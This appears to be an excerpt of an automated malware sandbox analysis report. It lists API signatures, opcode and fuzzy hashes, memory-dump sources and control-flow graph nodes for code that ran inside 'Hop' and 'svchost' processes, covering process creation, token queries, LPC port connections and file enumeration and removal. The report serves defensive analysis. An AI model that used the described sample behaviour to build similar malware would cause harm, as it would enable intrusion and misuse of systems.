                                                                                                                                                                                                                                                                                                          • API ID: DeviceDriveLogicalQueryStrings
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3173366581-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 44ebf3bb3f659db2baf1671957d6035b84d40f7447c0330e21c1dfb288bbfcca
                                                                                                                                                                                                                                                                                                          • Instruction ID: edae4f945438580daf39f251a52daab0be4b146f75d9359b5a4a358de4256909
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44ebf3bb3f659db2baf1671957d6035b84d40f7447c0330e21c1dfb288bbfcca
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B431E731618A498BEF60DB14D8997AA73E6FBA4740F01051AE54EC3180EB79DE40CB8A

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b6ed53fab85cf22cf76427c2e966a0a197060846b061c1a52c71d60efdb2ca86
                                                                                                                                                                                                                                                                                                          • Instruction ID: 481c7088833f45280c688636c330fce74a553f14e5d3a2170b69e0349a9e7a2a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ed53fab85cf22cf76427c2e966a0a197060846b061c1a52c71d60efdb2ca86
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2918A316085494BEB6CDF28CC8A3BD77D6F795345F15412EE5CBC2282E935C6078B89

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1778838933-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: aedaa32b066cd7baad790dc79b89f0f0aa25ff69fa0ea66035def9c6c87aec9e
                                                                                                                                                                                                                                                                                                          • Instruction ID: fcf8b2b4877b0f307e71840c2bd57dfcad1b4985a1c368ef56dec8facda9ac14
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aedaa32b066cd7baad790dc79b89f0f0aa25ff69fa0ea66035def9c6c87aec9e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91018830228B0A5FEF45EB789895B6A73E9F764340F400519D65AC3191EF39C601CB49

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Read$CreatePointer
                                                                                                                                                                                                                                                                                                          • String ID: MZ$PE
                                                                                                                                                                                                                                                                                                          • API String ID: 4132024448-1102611028
                                                                                                                                                                                                                                                                                                          • Opcode ID: ed02993aad010b8f0ed0d0dc1b69872bc261ae90b3cbae546a6cddcfd68a01dd
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3702c5aa0f51cb96d50df42863d8cc7f17c9c6e419ec9105cc7049a1effec561
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed02993aad010b8f0ed0d0dc1b69872bc261ae90b3cbae546a6cddcfd68a01dd
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7614530618A094FEF74EB18989A36D77D6E7A4740F114619E99EC3185CB3CDE418F8A

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateOpenValue
                                                                                                                                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                                                                                                                                          • API String ID: 776291540-149943524
                                                                                                                                                                                                                                                                                                          • Opcode ID: 62d38529be31c1c4406cadae21aaf7dda888b7df0d9feabcaf499976726d02fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: f7199981e45181da3f18a52f328ee0be9b99662371a9464f4035dcc05ac1d668
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d38529be31c1c4406cadae21aaf7dda888b7df0d9feabcaf499976726d02fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D651C531208B0C4FDB54EF68988A6AFB3D6F794341F414A2EE58BC3251DF74D9458B8A

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free$CloseHandle
                                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                                          • API String ID: 4080011421-3772416878
                                                                                                                                                                                                                                                                                                          • Opcode ID: 19bd0e1f4c380038fc96e62ce33c6398c15e8ead9e9bc0b200304ba1120fbf6f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2b13acbbe4498525367edec9f89b4ebb39cae193e052b0415382d7a022dbb3ff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19bd0e1f4c380038fc96e62ce33c6398c15e8ead9e9bc0b200304ba1120fbf6f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7051D93060CB095FEF54EB68D88A7AEB3E6FB98750F01451DE58AC3281DE74D941CB89

                                                                                                                                                                                                                                                                                                          Control-flow Graph

[Control-flow graph figure (legend: Executed / Not Executed); API call shown in graph: GetSystemInfo]
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 31276548-1545510068
                                                                                                                                                                                                                                                                                                          • Opcode ID: a88bb02aead4fe52cd93ba064d7017a54b9761c38897babe54b5f79178871d7e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 942627332124d53aa7bbbd99a90ddecaabd2a27d19a30d52cc9ab57b0202ddb5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a88bb02aead4fe52cd93ba064d7017a54b9761c38897babe54b5f79178871d7e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F831C53021CF0D9BEF54EB18D88A76EB3D6F7A4780F514629E14AC3180DA65DD458B8A

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-1545510068
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9e579be77159963f23b7a6aee61d5d767583c1faaf223818a1d0d66f61b70a4e
                                                                                                                                                                                                                                                                                                          • Instruction ID: a39cef0b18fd2e51d98a052315145099addedb862ed612980a950cb97897b731
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e579be77159963f23b7a6aee61d5d767583c1faaf223818a1d0d66f61b70a4e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A51C231618E094FEB94EB28D44E7AE77DAFBA4340F11416ED54AC32A2EF34C9458B85

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NJI@
                                                                                                                                                                                                                                                                                                          • API String ID: 0-1894075864
                                                                                                                                                                                                                                                                                                          • Opcode ID: d45665fd503c042bbd1cddf3e76509b083df421fb529cf4e6337dc35805fb2d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 41900210631ea17dfdacb04b29895e770fa5b114f3a263749fd2a45f84257753
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d45665fd503c042bbd1cddf3e76509b083df421fb529cf4e6337dc35805fb2d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EE14A7051C7D48BD775DF2988963EBBBE5EB99702F00492EE4CAC2281EB349501CB87

                                                                                                                                                                                                                                                                                                          Control-flow Graph

[Control-flow graph figure (legend: Executed / Not Executed); API calls shown in graph: CreateFileMappingW, MapViewOfFile]
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateMappingView

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          • API ID: Virtual$ErrorFreeFunctionModeProtectTable

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 449 243665e4888-243665e48a1 451 243665e492f-243665e4937 449->451 452 243665e48a7-243665e48c7 GetTokenInformation 449->452 452->451 453 243665e48c9-243665e48d2 452->453 453->451 455 243665e48d4-243665e48e4 453->455 455->451 457 243665e48e6-243665e4908 GetTokenInformation 455->457 458 243665e490a-243665e4924 457->458 459 243665e4926-243665e4927 457->459 458->459 459->451
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          • API ID: InformationToken

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 462 243665e8c08-243665e8c94 call 243665e5f90 * 4 472 243665e8d02-243665e8d04 462->472 473 243665e8c96-243665e8ca8 462->473 474 243665e8dab-243665e8dae 472->474 473->472 478 243665e8caa-243665e8cb3 473->478 475 243665e8d09-243665e8d22 474->475 476 243665e8db4-243665e8dd6 call 243665e1f2c call 243665e9990 474->476 486 243665e8da2-243665e8da8 475->486 487 243665e8d24-243665e8d3b 475->487 478->472 480 243665e8cb5-243665e8cf2 CreateProcessW 478->480 483 243665e8cfa-243665e8cfc 480->483 484 243665e8cf4 480->484 483->472 483->476 484->483 486->474 487->486 490 243665e8d3d-243665e8d46 487->490 490->486 491 243665e8d48-243665e8d96 490->491 493 243665e8d9e-243665e8da0 491->493 494 243665e8d98 491->494 493->476 493->486 494->493
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d45755ac3fc1b299357fa248614e5cf9831b05787f0c9c72564af89a9d49d463
                                                                                                                                                                                                                                                                                                          • Instruction ID: cc7727da5ba6b02f52a475cab1a3479b6b67e8f2d369ae936338eba11b42e2e1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d45755ac3fc1b299357fa248614e5cf9831b05787f0c9c72564af89a9d49d463
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E331E330214A0A4FFF58EF18C499B7637D6FB68742F01416AD84EC32A6DB34D900CB84
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c6a7c236d73697e4ca57ed050e55d544e6cacc2476fd745c83e7f6659eda1179
                                                                                                                                                                                                                                                                                                          • Instruction ID: bc57f4716f5cecf6810836e5c9430fce5ae1bdb195898e9478c5862e0b1280bb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6a7c236d73697e4ca57ed050e55d544e6cacc2476fd745c83e7f6659eda1179
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F921793071490A5FFFA4E778AC5E76A36DBEBA4740F454165910BC21BAEE38CE058B48

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:10.8%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:143
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                                                                                                                                                                                                          • String ID: ,$,$H$H
                                                                                                                                                                                                                                                                                                          • API String ID: 2459737528-3578512806
                                                                                                                                                                                                                                                                                                          • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3bbd9367d6dde05fbb468c3e11ceb89e262adcb54c10ef9ea1c80552148b96b0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7602913061CB848BD764EF18D88466FB7E5FBD9350F50493EE18EC3291DA74E9468B82

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Information$Token$FreeLibraryLoadProcessQueryVirtualfree
                                                                                                                                                                                                                                                                                                          • String ID: ,$,
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPathPort$NameName_free
                                                                                                                                                                                                                                                                                                          • String ID: $0$@
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort$malloc
                                                                                                                                                                                                                                                                                                          • String ID: :$\$\
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryFirstNextRemovecalloc
                                                                                                                                                                                                                                                                                                          • String ID: \
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPortThread$CreateTerminatefree
                                                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPortcalloc
                                                                                                                                                                                                                                                                                                          • String ID: $0$@
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-1545510068
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9a0d635755d8a24d93c63cab8bfbae9ae7092c3d51c1029aa018a74583f581cf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0a04a2a96608d6bdc8d203b45e31c2fb0fd85dc8aa6d7dbcc330663a9c59c5d8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a0d635755d8a24d93c63cab8bfbae9ae7092c3d51c1029aa018a74583f581cf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6114F70518B888FE350EB68C899B5BB7E4FF98354F500A2EE49AC3291DB78D544CB42
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2502124517-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e2fcdb0da9033e0b96ac5fedb13815d147d4e94b90461ca43ad420180aac7e8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66318F30608A488FE794EF28D8D879A77E5FB94320F50463BE45BC21D0DB38D885CB91
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleSuspendThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1038686644-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 18a18994d6b9c143577c479e187b9b1791d484b370013957ecf7271e787155ff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF91D631A1DA558BDB689F58DCC127A73E1FF5A320F24417AD08FC7586DA38E842CB85
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                                                                                                                                                                          • Instruction ID: e3fedaae0658703adf4b48d329f3494bc333c44cad861ebf3e4e6ccc8e1663e9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C602513161CA888BEB65EB18D855A9BB3E1FF95310F50453EE44FC3192DE34E945CB82
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
